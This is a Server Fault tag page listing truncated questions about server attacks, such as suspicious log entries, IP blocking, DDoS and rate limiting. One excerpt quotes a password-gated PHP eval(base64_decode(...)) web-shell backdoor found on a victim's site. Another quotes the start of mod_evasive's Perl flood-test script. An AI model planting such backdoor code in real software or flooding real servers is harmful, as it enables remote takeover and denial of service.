Highest Voted 'attacks' Questions - Server Fault Stack Exchange

1

vote

1 answer

What does this Apache access_log entry mean?

68.96.87.214 - - [07/Aug/2013:21:29:25 +0000] "GET /HNAP1/ HTTP/1.1" 403 501 "*************" "Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]" 177.47.105.41 - - [07/Aug/2013:21:57:26 +0000] "POST…

apache-2.2 hacking attacks

asked Aug 08 '13 at 18:19

Gasim

977
4
14
23

1

vote

1 answer

Block IPs if they access a resource

I own a server that it's costantly being attacked by scripts (that try to access to phpMyAdmin's setup file's and stuff like this). I've heard that many people get this kinds of attacks, but I'm starting to worry since they are getting more common…

apache-2.2 iptables block attacks

asked Nov 07 '12 at 09:46

Victor Oliva

113
2

1

vote

2 answers

I got some message about suspended site, which I have to debug, how do I proceed?

Possible Duplicate: My server's been hacked EMERGENCY The hosting company supplied an email to its client and the client wanted some help from me. the message states: Any items listed here which are folders named with 5 to 7 random letters are…

hacking suspend attacks

asked Aug 13 '12 at 13:35

tough

113
4

1

vote

1 answer

Is it normal to collapse VPS CPU with this script?

This is the script, it comes with mod_evasive: #!/usr/bin/perl #test.pl: small script to test mod_dosevasive's effectiveness use IO::Socket; use strict; for(0..100) { my($response); my($SOCKET) = new IO::Socket::INET( Proto => "tcp", …

apache-2.2 unix denial-of-service attacks

asked Aug 30 '11 at 08:36

TheBronx

1

vote

4 answers

Solution for DDOS

My server is under DDoS attacks. I see my access log and get something: 968966 93-97-53-41.zone5.bethere.co.uk - - [27/Jul/2011:12:13:58 +0700] "GET /forum/forum.php HTTP/1.1" 200 91231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5. …

ddos logging attacks

asked Jul 27 '11 at 05:38

Tuan Ngo

11
2

1

vote

0 answers

Is someone trying to hack into our system?

I have a CentOS 6 server that has misbehaved over the last couple of weeks. I have tried to trace network, adjust settings, and asked a lot of clever people about it (see more in this question: Something is closing connections in my CentOS VMs - how…

nginx networking attacks

asked Aug 13 '21 at 14:20

John Dalsgaard

203
3
11

1

vote

1 answer

Nginx log shows ssl handshake errors

I have seen my nginx error log is full of messages like this: (*date*) [info] 69487#0: *1064573 peer closed connection in SSL handshake while SSL handshaking, client: 95.64.*.*, server: 0.0.0.0:443 (*date*) [info] 69487#0: *1064574 peer closed…

nginx attacks

asked Mar 15 '21 at 10:17

fernandezr

113
6

0

votes

1 answer

Unusual hits in Apache log for localhost site

I have an Apache 2.2 webserver running on Windows 7 with six virtual hosts set up. Domain name A points to ?:/.../urls/1/ Domain name B points to ?:/.../urls/2/ Domain name C+D point to ?:/.../urls/3/ Domain name E* points to ?:/.../urls/4/ My…

apache-2.2 logging traffic attacks

asked Jun 26 '19 at 12:17

fgsfds100

3
3

0

votes

0 answers

Cloud server vulnerability analysis

I have multiple Hetzner cloud servers (Ubuntu 18.04) and I have encrypted the home directory with a +128-bit encryption using cryptsetup/LUKS. The server may only be accessed with SSH or Wireguard. SSH port is non-standard and we use also fail2ban…

security attacks vulnerabilities physical-security

asked Jan 25 '19 at 15:46

Seaotter

9
1

0

votes

1 answer

Block injection hacker

I have someone injecting my php files with the following code: if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { eval(base64_decode($_POST["cookies_p"])); } if (strpos($_SERVER['REQUEST_URI'], "post_render" ) !== false) { $patchedfv =…

php attacks

asked Jun 22 '18 at 11:28

sebastian.roibu

105
5

0

votes

2 answers

Concrete difference between faults and attacks

I don't know if it is the good place to ask this question but I believe it is OK. My question is simple: how can one make a difference between a fault and between an attack? A denial of service could be cause by both, what may be considered as…

security fault-tolerance attacks

asked Jun 04 '18 at 08:23

Ecterion

13
2

0

votes

0 answers

apache2 proxy error - are we beeing attacked / hijacked?

We are getting a lot of load since 2 days on our webserver (apache2.4, wordpress + woocommerce, nodeJS server) Now I saw a lot of URLs in the error logs which I dont know. Most of them from china. It looks like we are beeing attacked / hijacked. We…

apache-2.4 proxy ddos attacks

asked Dec 17 '17 at 18:28

Felix Hagspiel

101
2

0

votes

0 answers

Safety issue of running exe on a server

I'm pretty new to server-side stuff. The difficult situation is that we want to allow an application installed on the server to run python on the server, but the application server installation guide said that "running EXE files creates a…

python attacks safety

asked Oct 10 '17 at 07:51

Penny

111
1

0

votes

4 answers

Any reasons to not IP ban those that get a HTTP 404? Is it possible and easy?

So I have a WordPress site and we all know how vulnerable WordPress plugins can be and get over time. I'm curious to know what you guys think about possibly just IP banning anyone that get an HTTP 404. Obviously I'd have to ensure that the site does…

ip wordpress attacks

asked Aug 27 '17 at 19:12

LewlSauce

151
6

0

votes

0 answers

Nginx rate limiting at server level excluding a particular IP

My server is constantly being flooded and I am looking to limit the connections. I want to do this at the server level (because I have multiple websites) but every now and then I run a cache warm script from a particular IP. limit_req_zone…

nginx rate-limiting attacks traffic-management

asked Jun 19 '17 at 19:00

Quintin Par

4,373
11
49
72

Questions tagged [attacks]